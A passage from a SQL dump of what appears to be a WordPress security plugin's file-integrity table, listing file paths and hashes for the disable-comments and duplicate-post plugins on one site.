403182EBE54959DCC819050B9B49B962A5CB2270E4B522B7ED18BE8A5CDC,'',0,'?'),(0xB28A352B13CF86C662D3504F9CA9A5AD,'wp-content/plugins/disable-comments/assets/js/pagination.min.js','/home/eckank5/public_html/wp-content/plugins/disable-comments/assets/js/pagination.min.js',1,0x00000000000000000000000000000000,0xFAB53437EDB81986CE4A40E9FD1CBE60,0xF319D05AD60CA37EC7CD35FB94F1840727F24D516D8B2E25D036BC272EAA0FFA,'',0,'?'),(0xF4116CF74979CFB884797B9A390EA0D6,'wp-content/plugins/disable-comments/assets/js/select2.min.js','/home/eckank5/public_html/wp-content/plugins/disable-comments/assets/js/select2.min.js',1,0x00000000000000000000000000000000,0x7C98B05DD4F3D7C693EB34690737F0D8,0xD05E2C287DD9488CA33FF26171B20D986A0262F957BF15434240D10559E5DF6D,'',0,'?'),(0x550B194FEFDFDE4960E7190B286F7EF0,'wp-content/plugins/disable-comments/assets/js/sweetalert2.all.min.js','/home/eckank5/public_html/wp-content/plugins/disable-comments/assets/js/sweetalert2.all.min.js',1,0x00000000000000000000000000000000,0x287C8540A6C222FA18A8A71C8440AF91,0x15D17CFDD85352F8E3313B5657B2A463A822E1035DA60FDDD4251B5596BE22BE,'',0,'?'),(0x6ACACF2162D21E8B8E098CC081507F3B,'wp-content/plugins/disable-comments/disable-comments.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/disable-comments.php',1,0x00000000000000000000000000000000,0xAE0011F80D64D28962C98274DED101A6,0x1D50EEC81EDBC129CAC73B07FD3FE021855116B6FEA81B20E8F319A0A635584C,'',0,'?'),(0x15786C236B80ADA6A16A7AC03F65C71D,'wp-content/plugins/disable-comments/includes/class-plugin-usage-tracker.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/includes/class-plugin-usage-tracker.php',1,0x00000000000000000000000000000000,0x4C9E87992064102EA3F797EB79B232BF,0x94166C40B599BAEFA7918A5BC510650378E291CF0C571CC9CD993AF9F03B78D7,'',0,'?'),(0x45DC311C8FC9641B3AF680CFED786DDA,'wp-content/plugins/disable-comments/includes/cli.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/includes/cli.php',1,0x00000000000000000000000000000000,0xB78ACCCF848FE37E6A9F1FCC4F732F6E,0xD35F45E10B15219B3D340BBC07ACD97B767ADB552AC01304DD8B47E497FF8B43,'',0,'?'),(0x387F5EA56BEDB97BCBF74712EC6D49C3,'wp-content/plugins/disable-comments/languages/disable-comments.pot','/home/eckank5/public_html/wp-content/plugins/disable-comments/languages/disable-comments.pot',1,0x00000000000000000000000000000000,0x60E939C9A14E3714D7A142AC78399A80,0x793D528946C1E0D37513A45245005C36F5564ECD84CDB979FA595948B94FF01E,'',0,'?'),(0x3B096F853CC08718A04B1E6C6CAB2904,'wp-content/plugins/disable-comments/readme.txt','/home/eckank5/public_html/wp-content/plugins/disable-comments/readme.txt',0,0x1865E392BF7196495EECBEB78BBCF5CA,0x1865E392BF7196495EECBEB78BBCF5CA,0x9851C9EE74B69315D94CB65700DF83BD622C138CFEFEAC4C73F70AE69722B485,'',0,'?'),(0xCD96D247449A7BCAF3461D8C24DC914F,'wp-content/plugins/disable-comments/uninstall.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/uninstall.php',1,0x00000000000000000000000000000000,0x371953C093CD18094E9546726FE1593A,0x52406DA1A05B9DFDA0E12E177D6AAFF6D6DACF3BD305113508AA0C57834C811B,'',0,'?'),(0x09BC655D9AE897168A0F26238DCA3B04,'wp-content/plugins/disable-comments/views/comments.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/comments.php',1,0x00000000000000000000000000000000,0xB3F1CC92280FE5573792D0C0AFEA1A69,0x7F503C1576A911DDBB82EA154BF9BDE91472F687CF5CF30D937D5810D86F6455,'',0,'?'),(0x492FF522608D50B56153314B48D18282,'wp-content/plugins/disable-comments/views/partials/_delete.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/partials/_delete.php',1,0x00000000000000000000000000000000,0xE5EAE65D24CD43A7F126E3BF5EEEEF07,0xC75E6F42C7BF2E4E866575D766F23484D953EBAFD69F0BCAF159706AE1F5B357,'',0,'?'),(0xBD9E9CF55E6AB56337C5C799E0D3EF5D,'wp-content/plugins/disable-comments/views/partials/_disable.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/partials/_disable.php',1,0x00000000000000000000000000000000,0x9C93A5EF28A75BAF1B701BC61620392F,0x1391F098E110746FE44336621F3A7FE7EE0D8C9F483CF83BE2372716139A82E2,'',0,'?'),(0x808823617009CBA496160CE31F2CB53C,'wp-content/plugins/disable-comments/views/partials/_footer.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/partials/_footer.php',1,0x00000000000000000000000000000000,0xAF08260C095E85081E9E57495651C197,0xEF16BFCB42A85C3A5BF897354C32059A11CEA57473ACC47D23A0F84374592C68,'',0,'?'),(0x5B74ACB7643E5805A1DD873FF16310E0,'wp-content/plugins/disable-comments/views/partials/_menu.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/partials/_menu.php',1,0x00000000000000000000000000000000,0xDC5F47C4DB4DF5191457A5DC357A52CD,0x40D76A6F30A856162CC510E50274C9C602E7EB4683FD98C332EE9F604BB75E75,'',0,'?'),(0x223B29D02C8D151BA5C0FA1330113505,'wp-content/plugins/disable-comments/views/partials/_sidebar.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/partials/_sidebar.php',1,0x00000000000000000000000000000000,0x52FF4929BA188EF46CA771001A86EBCD,0x47D7762FA9D65E03710356CE45516382876809192C0BC0AC5593E9CED39346B3,'',0,'?'),(0xC730BBBF2B7BC28911C4E624B5879ADC,'wp-content/plugins/disable-comments/views/partials/_sites.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/partials/_sites.php',1,0x00000000000000000000000000000000,0xFCA19640F379F64D148FD24CD9BE35DE,0x4971AE02DC4A96A4B5AF5E06ED67A573D8BA31E20CA5239F1FA630B05615EED2,'',0,'?'),(0x90EFC97454855B028B08843F9BC9ADAB,'wp-content/plugins/disable-comments/views/settings.php','/home/eckank5/public_html/wp-content/plugins/disable-comments/views/settings.php',1,0x00000000000000000000000000000000,0xA93EDCA0488167EA94B5E42575A26465,0x9D084A7B8A3F18A09D524EF38AE78AB9DD3C3A2B214E21BC2317D0420828EAEE,'',0,'?'),(0x1424FC158CA573F478A49D1093657CC1,'wp-content/plugins/duplicate-post/admin-functions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/admin-functions.php',1,0x00000000000000000000000000000000,0x1C1ABA3856C6191FF5A3368B9A112636,0x122E556A6B5130804D35D8E4649A06B2C68ACFBBC6E5F5641034CF28778E08A4,'',0,'?'),(0x0158F2D67CBF55A21D4E547A79E10E13,'wp-content/plugins/duplicate-post/common-functions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/common-functions.php',1,0x00000000000000000000000000000000,0x1CD8B5DCDBF1DD611705965B24211C3C,0xB0F24AD8385DB123BF7BF46BC1223795D3F1170F5995DCF324F0769EEDFBA6DD,'',0,'?'),(0xACA9EBB85BB4AE97CF011293D431DF5A,'wp-content/plugins/duplicate-post/compat/jetpack-functions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/compat/jetpack-functions.php',1,0x00000000000000000000000000000000,0xD263C8198C9078D20FB8BD140BB2D189,0xAA4F2B53914D9094818182DE4130ED9680429D24EB8612D46E8C41D836E081D9,'',0,'?'),(0xB4256F1D35ABDD3015448153269F5EA4,'wp-content/plugins/duplicate-post/compat/wpml-functions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/compat/wpml-functions.php',1,0x00000000000000000000000000000000,0x3BE2AA390274A2AE39F383C2519FF320,0xD03CA11374ACEBF9B6E6AD38E3687317924F2311FC41DF9703ABD2C67D8C0CA8,'',0,'?'),(0x403D074E9ABC89FD1468125BF1BB437C,'wp-content/plugins/duplicate-post/css/duplicate-post-options.css','/home/eckank5/public_html/wp-content/plugins/duplicate-post/css/duplicate-post-options.css',1,0x00000000000000000000000000000000,0x2961ECBD82FEE5B3715999FA7D7AF677,0xEC90470C4CFC5EE882939BE43E3C64B5FCC255BC74D2865CC6E852A971E63A4F,'',0,'?'),(0x3A402497E3EA602D4F703578B9E34482,'wp-content/plugins/duplicate-post/css/duplicate-post.css','/home/eckank5/public_html/wp-content/plugins/duplicate-post/css/duplicate-post.css',1,0x00000000000000000000000000000000,0x6CEAE296DF05A5A27BFA81954D7BD8C9,0x2B923B9DB08B2CE67E66E79EC92389B627E3C97770F1DF0B890480A32460E124,'',0,'?'),(0xC591786D20FCE574F49E69731268A6E7,'wp-content/plugins/duplicate-post/duplicate-post.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/duplicate-post.php',1,0x00000000000000000000000000000000,0xEBC7CD6E94D7D596DE6548526270FCC9,0x26C930B03C6BB2AE6616CCF7900CC19B4DF3ED7DCBC68B41FCDA0C736C46A3DC,'',0,'?'),(0xBBC8EE89F1674338A44242EEEE02FD59,'wp-content/plugins/duplicate-post/duplicate_post_yoast_icon-125x125.png','/home/eckank5/public_html/wp-content/plugins/duplicate-post/duplicate_post_yoast_icon-125x125.png',1,0x00000000000000000000000000000000,0x259362608E1DB326D53A0C3BAEBE86B5,0xD7CFD644CAD46E24A4F9CFDFC86CB21E1B8309C07C10840F870D4475EA07595D,'',0,'?'),(0x9DEE0DC29C2D39EB8749924BF7F708B5,'wp-content/plugins/duplicate-post/gpl-2.0.txt','/home/eckank5/public_html/wp-content/plugins/duplicate-post/gpl-2.0.txt',1,0x00000000000000000000000000000000,0xB234EE4D69F5FCE4486A80FDAF4A4263,0xBCFF007631A3EA73D41D4EED3E63491F4412D9A6BE9DD60F8449E9AD30FF1D2D,'',0,'?'),(0x201B610634ED338D32807416B126EE28,'wp-content/plugins/duplicate-post/js/dist/duplicate-post-edit-450.js','/home/eckank5/public_html/wp-content/plugins/duplicate-post/js/dist/duplicate-post-edit-450.js',1,0x00000000000000000000000000000000,0xF68F7E0EF250630B69E0A4991FBC15A6,0x914D511A4AE6AE6E4F98448320112CF7085DD1E10AF1851AB882CAF6EC312404,'',0,'?'),(0x0FBE8102378AF0DD1209E3D42C129723,'wp-content/plugins/duplicate-post/js/dist/duplicate-post-elementor-450.js','/home/eckank5/public_html/wp-content/plugins/duplicate-post/js/dist/duplicate-post-elementor-450.js',1,0x00000000000000000000000000000000,0x84C66949514AE6AA6FFC7A7767C8FABC,0x04781479D3EAD74847D5D663FA0DA2CC82CF1A4ADDE3188E8F464787E154152D,'',0,'?'),(0x7C1C5D43C8085EA0E54806FFDB945FD2,'wp-content/plugins/duplicate-post/js/dist/duplicate-post-options-450.js','/home/eckank5/public_html/wp-content/plugins/duplicate-post/js/dist/duplicate-post-options-450.js',1,0x00000000000000000000000000000000,0xE7E693050B62608DEC3BD736FED86EE9,0x407CBF6AAAD9D78DCCC084ADB630F5782CB4EF19BD62BDC1DD564349133FABB0,'',0,'?'),(0xE964C7EC99CF6D9712C65DD8AFA6A4F6,'wp-content/plugins/duplicate-post/js/dist/duplicate-post-quick-edit-450.js','/home/eckank5/public_html/wp-content/plugins/duplicate-post/js/dist/duplicate-post-quick-edit-450.js',1,0x00000000000000000000000000000000,0x56BCAE25BC44A349C6A65667A20668F2,0x097754AF5CF1F7F7A94D9724C5CC5EDF6A9B8855F101244869D4DC48DBF49FF2,'',0,'?'),(0x026A031B04D4EA4925A37BE9F941E3F4,'wp-content/plugins/duplicate-post/js/dist/duplicate-post-strings-450.js','/home/eckank5/public_html/wp-content/plugins/duplicate-post/js/dist/duplicate-post-strings-450.js',1,0x00000000000000000000000000000000,0x6ED49FF9FBA3514493CCC165EACAB780,0xF9FE35297E8BC5D65B5095403A59A7296AD7C01B6F1DAE03F5C631C54E916535,'',0,'?'),(0xA293DD8B0348D8DEA27FA08586A831D9,'wp-content/plugins/duplicate-post/options.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/options.php',1,0x00000000000000000000000000000000,0xEE85264FA4B4D6A22A4B6247E3BA5FC5,0xD00B914AF684011AECD48E37AB7C7255E6073AEC12D1B0A0D1976C073BC8C01E,'',0,'?'),(0x8C50A9B0FA816637AEC722BAE005D27C,'wp-content/plugins/duplicate-post/readme.txt','/home/eckank5/public_html/wp-content/plugins/duplicate-post/readme.txt',0,0x1607E106E062AE753EDBBF25D67D364F,0x1607E106E062AE753EDBBF25D67D364F,0xA583E347F9686DE8660CEACD993B6558C94C43699C2CAE0EF12A252B088D85A7,'',0,'?'),(0xA80800982B96527C6B38B85E1E14A5CB,'wp-content/plugins/duplicate-post/src/admin/options-form-generator.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/admin/options-form-generator.php',1,0x00000000000000000000000000000000,0xFDF5DA047790C75C683DD26CE29C597A,0x267603045AE802F21E609BDEFDF085CF5293298B4EE9808488729FF9B6EDEF05,'',0,'?'),(0xE0D5EE030E3DC1864158AC6F98E6F4DA,'wp-content/plugins/duplicate-post/src/admin/options-inputs.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/admin/options-inputs.php',1,0x00000000000000000000000000000000,0x147774685171DA8B8393CA07E3F7EF57,0xF09635020655635BF814A6F4B63BAA735800690AC3098B409CAB418B3F119883,'',0,'?'),(0x5C8D861E92DCD4F95D6A23C03B565447,'wp-content/plugins/duplicate-post/src/admin/options-page.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/admin/options-page.php',1,0x00000000000000000000000000000000,0x84AA43F5137B57588656B6735D7F9F7F,0x379CB88B327158BF6E46DCAD592441D3F16E7EE8D87866A3E7E64C82ED1DAFE6,'',0,'?'),(0xD5495AECE91E5785BA71883D50E82DF3,'wp-content/plugins/duplicate-post/src/admin/options.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/admin/options.php',1,0x00000000000000000000000000000000,0x996A650D017D74D388D9735E67CB76F7,0xEB54658CC381B1773684BE57937E47DAAC1B0232B840A8F01D35C697C3995819,'',0,'?'),(0x4BA520BA8385B59B2BF4F243543D0A71,'wp-content/plugins/duplicate-post/src/admin/views/options.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/admin/views/options.php',1,0x00000000000000000000000000000000,0x5AAA8677923CD31AB8370A812745574B,0xE59068876E36062D4F42FC404488897D14A02C1DDBAC317240DEB1056C17571D,'',0,'?'),(0x071F6867FD39D50355CCA661E42C1913,'wp-content/plugins/duplicate-post/src/duplicate-post.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/duplicate-post.php',1,0x00000000000000000000000000000000,0xF12908D692DEEEB397B02A42D56ACB86,0xCA9FF946597E730F505E51E165065D7C5BC8A94D931B43B342AD40179C8BAE70,'',0,'?'),(0x2D14EF02893BB6BD14D82132EDB3E810,'wp-content/plugins/duplicate-post/src/handlers/bulk-handler.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/handlers/bulk-handler.php',1,0x00000000000000000000000000000000,0xCD0263BF5FDCB264A4EFDBCE8718E1D0,0x49328853EEDEE229BEF1837E05E5F7F9A1A43F9BC8BF31CCD82456D41DC85334,'',0,'?'),(0x03AE38C693D7497AD95DA530F3592FE9,'wp-content/plugins/duplicate-post/src/handlers/check-changes-handler.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/handlers/check-changes-handler.php',1,0x00000000000000000000000000000000,0x697F9106B15CC33662FDCBA7FB296229,0x8A7DB88A7342E87F7E2F01EF5F7F4F7CB75D66A9ADE7EBBCB3ABFA758F7DD815,'',0,'?'),(0x898DE851A5B0B3AE94CCA504D888DC00,'wp-content/plugins/duplicate-post/src/handlers/handler.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/handlers/handler.php',1,0x00000000000000000000000000000000,0xC118FF34B8946B25AE4F30EBAA169059,0xD731D72CF09ABE45CB73F4DF609FA0C65D086161DDF98FE5C5ECD4BA5ACE320D,'',0,'?'),(0x9F73EC82B8AC97CBBB7699222AA70CBD,'wp-content/plugins/duplicate-post/src/handlers/link-handler.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/handlers/link-handler.php',1,0x00000000000000000000000000000000,0x6C1CEDC8278252EA0968585B254622BF,0x5CE0F1E9C51719B5A37D6CE5FA5E02D9D61438FB61DAB71E7B19B7FD777828D0,'',0,'?'),(0xC9DBF9C75095CA3E20C13D9330BD165C,'wp-content/plugins/duplicate-post/src/handlers/save-post-handler.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/handlers/save-post-handler.php',1,0x00000000000000000000000000000000,0xCF655D4B6A02C47ED6AD9C743F3F654C,0x81BDAC401A0883394C1B8C8C7A7500326131368AD7F2099809A1C5953189DC69,'',0,'?'),(0x996F198A9DFB08FC1DFD927D75AF97AE,'wp-content/plugins/duplicate-post/src/permissions-helper.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/permissions-helper.php',1,0x00000000000000000000000000000000,0x90C297F69100B224F52A0E85F6414D76,0x7DECBEEF3354D4F6026D710F1067D97BDC5259959208E284B74EE2EE52C059C4,'',0,'?'),(0xA775B0CFC7039BD3DBC44B4AE247EBB3,'wp-content/plugins/duplicate-post/src/post-duplicator.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/post-duplicator.php',1,0x00000000000000000000000000000000,0xE27AABB2F36F4217D2FB6FF6960EBEC0,0x341DEEDD6A81DD8F6B40289C358F1678D5583756F2CCF9B59C4977927CDA0756,'',0,'?'),(0xFE8A763E879A07D841FDB5259B49BF7A,'wp-content/plugins/duplicate-post/src/post-republisher.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/post-republisher.php',1,0x00000000000000000000000000000000,0x4C45117339EED7A10309434A5864901D,0xAD5D54BE64932F924D5DFCE993D35D8A2A64CDE0802195E8191DFB595EF80273,'',0,'?'),(0x7280C2CA030E02B80D2BF3DE89A352F3,'wp-content/plugins/duplicate-post/src/revisions-migrator.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/revisions-migrator.php',1,0x00000000000000000000000000000000,0xA688800CC4D53C848A0CAB8AFC9154F1,0x5F998B02A75E624F8E6BEEE57973C02CA1B04B3FE38D2C104A15FF34CC75B846,'',0,'?'),(0x993DA20EAF1B2694237A1B403CD73AAE,'wp-content/plugins/duplicate-post/src/ui/admin-bar.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/admin-bar.php',1,0x00000000000000000000000000000000,0x06294BC52F22241F3127D51F1FEB73AC,0x1DEAED4DA36F82DC62BD2CD7E8A31F2B36FDEB69A18CC4ECFDE0A316B5D9727C,'',0,'?'),(0xA7C330CE5F0BFE8AAEEDC8E9347086E0,'wp-content/plugins/duplicate-post/src/ui/asset-manager.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/asset-manager.php',1,0x00000000000000000000000000000000,0xBCB33210D2E3ECD62B10D4DF7832F4E2,0xB54521BFE147FA5AC9395D6DDCE5E5C051B18D2E35718D31334202C33187DD1E,'',0,'?'),(0x074CFB1B22F8795322BEFAD5E9920A9A,'wp-content/plugins/duplicate-post/src/ui/block-editor.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/block-editor.php',1,0x00000000000000000000000000000000,0xB4EE1ED6B104354BB5B9A03FCFD2AB47,0xB970D52D2EC10E65F297FFBA9AD00E340C4F79337FD1F55470495EF533450104,'',0,'?'),(0x5A6770FAD0853356EEE77139C9583211,'wp-content/plugins/duplicate-post/src/ui/bulk-actions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/bulk-actions.php',1,0x00000000000000000000000000000000,0x80130A7DEEAC75263275CCB6D5AF700B,0x340E6B17667A7AA362CE5480234794CDF3718C026273365BE15D87F968C4850B,'',0,'?'),(0x7B216444BB6E30AC1320E1C4984ED736,'wp-content/plugins/duplicate-post/src/ui/classic-editor.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/classic-editor.php',1,0x00000000000000000000000000000000,0xBA5E5B28621460F5F74A203DB67F1201,0xC14929B58ADF1D688B82ED6D66580ACB3F9D4DC2E15C4D3A6920343BF1C9AB86,'',0,'?'),(0x23C6D94C90C444A478D186325D053E20,'wp-content/plugins/duplicate-post/src/ui/column.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/column.php',1,0x00000000000000000000000000000000,0xFEE063103DA34E96F49A0F423937B6AF,0xA97E916759B7AB2BA14F6F6A1D7A5716E0F6CFE6B9695A5C03E4B676B950856B,'',0,'?'),(0x38D54D1ADA2D035294EFC3729D0F8411,'wp-content/plugins/duplicate-post/src/ui/link-builder.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/link-builder.php',1,0x00000000000000000000000000000000,0xFF4290C9C45329D44319E1F0351EB322,0xB8DD64E3017DD164891D0B7D7EAB3D3C6B6B8D060CB216115A1A94FF6ECD1931,'',0,'?'),(0xCB41576E71AA3A5E15A4C2CA8CD94F80,'wp-content/plugins/duplicate-post/src/ui/metabox.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/metabox.php',1,0x00000000000000000000000000000000,0x8ADF29E79FC19081A043030E4C5CAFD3,0xD1943A1E2A46AA4C8DBB8DDE8A0781E1F26846E3FDFE7C1D00A218975D19EBF8,'',0,'?'),(0xE8F217373C5FB85EAA3AA248E3A39849,'wp-content/plugins/duplicate-post/src/ui/newsletter.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/newsletter.php',1,0x00000000000000000000000000000000,0x74B052AB1EA856721BD87DDDC509EED9,0x02D9AFFDDF9DF5E47D06C36F917B4A18B6CB01BC8CC51376ECDE63017EE12D05,'',0,'?'),(0xA15B5282864F13B7AB87408323D1FAF2,'wp-content/plugins/duplicate-post/src/ui/post-states.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/post-states.php',1,0x00000000000000000000000000000000,0xCA79277A5AB0F5CCA3E6DEBD8C698F8E,0xFA7F2967224C1ACDEED5159BCB51376AF6782F9361FBA7C76322EF05BC7B68F0,'',0,'?'),(0xACAADA3598C1AC3B7C484D1BE85A589F,'wp-content/plugins/duplicate-post/src/ui/row-actions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/row-actions.php',1,0x00000000000000000000000000000000,0x9589CF404936AB39A2FB2C721C897328,0xB1F4DCC7C9E2F9531679464D41D706C08E96B606D57E0D549FF7F18B68C20982,'',0,'?'),(0x1CF43687D54C3020D475DEB357434180,'wp-content/plugins/duplicate-post/src/ui/user-interface.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/ui/user-interface.php',1,0x00000000000000000000000000000000,0xA915076113A60B5980AF101EDA45C9E6,0x180363EF2CF20EBB175EBE09DE625979B3B238806BEF1E7F74B86E200EE54D69,'',0,'?'),(0x59BBF4C0D335BA1C964C3A7266548DA4,'wp-content/plugins/duplicate-post/src/utils.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/utils.php',1,0x00000000000000000000000000000000,0x8003898FD5811339338A36E4D411E28C,0x49F1B76AC831FEE8B7E683F879C1072431FEF6C04A439C5A1D2AC4514F0FA105,'',0,'?'),(0x450AF6AD1E674015DC3DF0528AB8B3AE,'wp-content/plugins/duplicate-post/src/watchers/bulk-actions-watcher.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/watchers/bulk-actions-watcher.php',1,0x00000000000000000000000000000000,0x2D38F25BF9206CBB2433E5DD63089936,0x8A0C38A17318F01F7D4BD005F09B538C58F60796933C7E2404A0788122974735,'',0,'?'),(0x9637EB58148C55B1C827CDF011AB17F6,'wp-content/plugins/duplicate-post/src/watchers/copied-post-watcher.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/watchers/copied-post-watcher.php',1,0x00000000000000000000000000000000,0x1A3EE85CA454150F2E86165C5E8944D9,0xFDCBCE5A1E39719FBBB1822A2C1D879AD6DED1444E36BDE22C1560C3422A45D5,'',0,'?'),(0xC7934ADFE5B3E1A8213BC5A27901CF6A,'wp-content/plugins/duplicate-post/src/watchers/link-actions-watcher.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/watchers/link-actions-watcher.php',1,0x00000000000000000000000000000000,0xFCCAC3D024F553247582A7F0BFC7BF2A,0x1829C80FA2F81710ACB646C91F9142C6E4C83658520E0E53B569619974EF309E,'',0,'?'),(0x73D79362F410ED05C4A1D6B093364232,'wp-content/plugins/duplicate-post/src/watchers/original-post-watcher.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/watchers/original-post-watcher.php',1,0x00000000000000000000000000000000,0x1A9EE1BF3A2C86CD52BCCB274CE4034F,0x92BB957F9E90272A22B9ED8200FB7FDB363B299829B61E26C39EA38AA718497A,'',0,'?'),(0x6586773B526BB3EAACBFB6206930CFFB,'wp-content/plugins/duplicate-post/src/watchers/republished-post-watcher.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/watchers/republished-post-watcher.php',1,0x00000000000000000000000000000000,0xDDB134ADB48139EB66CADEE127BBEFE9,0x64E7BD59580E3C99CBDF4A02DEB66C55A0025B2D9C9968FE16DD1BCDAE3AE420,'',0,'?'),(0x9163433BB1B556F0341D63BC531157D6,'wp-content/plugins/duplicate-post/src/watchers/watchers.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/src/watchers/watchers.php',1,0x00000000000000000000000000000000,0x73AF72D31571D7588AAD3BB8C10F2AA1,0x86C96911A9D76AEBA6DE8EF0EA8027BB3C644B33A2406762408C6A16EE5D2D22,'',0,'?'),(0x94ABC9C98299BAE464CC2D287F4C1898,'wp-content/plugins/duplicate-post/vendor/autoload.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/autoload.php',1,0x00000000000000000000000000000000,0x0FD3D4609194DE62BA791C1B50FB3A0A,0xF2CBF11604F486B7959CF4A313826EE0D49C8D40F785C6EBC0CB1FE43034EE98,'',0,'?'),(0x649A0A1FA0E70A0F466D2270579668BA,'wp-content/plugins/duplicate-post/vendor/composer/ClassLoader.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/ClassLoader.php',1,0x00000000000000000000000000000000,0x80E3127BB630C512C42CFB51366EC09C,0xED60A00C89D5EAE8E7739B4EE1FC2ECE2DDA89F3BC474454FA8BB6B82D0A74D4,'',0,'?'),(0x8EB773C780FE6C1FB2B9408D074A09A6,'wp-content/plugins/duplicate-post/vendor/composer/InstalledVersions.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/InstalledVersions.php',1,0x00000000000000000000000000000000,0x13E6E46602B746A98D692A8C1B663E3C,0xF1A64DEED7A06B6979D8CCA827DB1B8EEF07B353B3BC0A56D77C54C4B41BC0BA,'',0,'?'),(0xBA59451BA44E1BCFE867DBE949E841A3,'wp-content/plugins/duplicate-post/vendor/composer/LICENSE','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/LICENSE',1,0x00000000000000000000000000000000,0x955D5FE58C231244F6B49000F383B5E2,0x1A209FF8DB92F625A713347E4ED97E47682162D817AD3A77829805C98CBF9927,'',0,'?'),(0x2BA1CBDFC816A168679EECDBA957AC57,'wp-content/plugins/duplicate-post/vendor/composer/autoload_classmap.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/autoload_classmap.php',1,0x00000000000000000000000000000000,0xB38874EAF76E41B2815A00FED494C1A6,0xE762740928DB57E8064DA4517C111F1BAC0BE73C22FAF6478C6E8E352EEC93D7,'',0,'?'),(0x68F37A482851EA2E625766D0EC19A14F,'wp-content/plugins/duplicate-post/vendor/composer/autoload_namespaces.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/autoload_namespaces.php',1,0x00000000000000000000000000000000,0x35E12C7D76C4A81633BCF547C0E229A9,0x45BD72344000B8D4A124A6E27AE6FA33F0B8246CB2EA1AD06069E46578C36CCA,'',0,'?'),(0xD18FB0CD1FAB488F6E36D27ABF4B2248,'wp-content/plugins/duplicate-post/vendor/composer/autoload_psr4.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/autoload_psr4.php',1,0x00000000000000000000000000000000,0xCA4C699C1D868DFBB2A7BAEECBCA60E6,0xD3C0A87FFAC071ED33FAED25953AA11DBA61E9FF9653AE518E55D39903EF8765,'',0,'?'),(0x0F297F3CE4526817FE55EB0123AF6589,'wp-content/plugins/duplicate-post/vendor/composer/autoload_real.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/autoload_real.php',1,0x00000000000000000000000000000000,0x8F05496C72493206691BA696E1AB0AC6,0xD65EACAF52FD64200AFFDCF09DB2C41F962DBD34391C1CC7DA6CEA21C3B501FA,'',0,'?'),(0x2D3DB3B339C1D58C9679C12C4A5EFCE8,'wp-content/plugins/duplicate-post/vendor/composer/autoload_static.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/autoload_static.php',1,0x00000000000000000000000000000000,0x97F89F65C83D86408EDE4D59E2FE28C1,0xEED79EA12D079768CD3D1F195440FB70CD6789CD847B84574EBDE35BD03C72B7,'',0,'?'),(0xCCF5D3B908B20FE4B761B82949B8B806,'wp-content/plugins/duplicate-post/vendor/composer/installed.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/installed.php',1,0x00000000000000000000000000000000,0xD2AE607B81026C89E81D1396ADDE7BEE,0x3524E26B12A2C3F8D2D37A6537379C61D3350307F2ACB88AFFC6C9E04BD0613B,'',0,'?'),(0xCA250C1471C038027D19CF9D8190A5E6,'wp-content/plugins/duplicate-post/vendor/composer/platform_check.php','/home/eckank5/public_html/wp-content/plugins/duplicate-post/vendor/composer/platform_check.php',1,0x00000000000000000000000000000000,0x15E1EFFF88933BE3DD5740E3C9530478,0xFACEE7FE4937E9C9AD27A0BC16A190DA7F81B1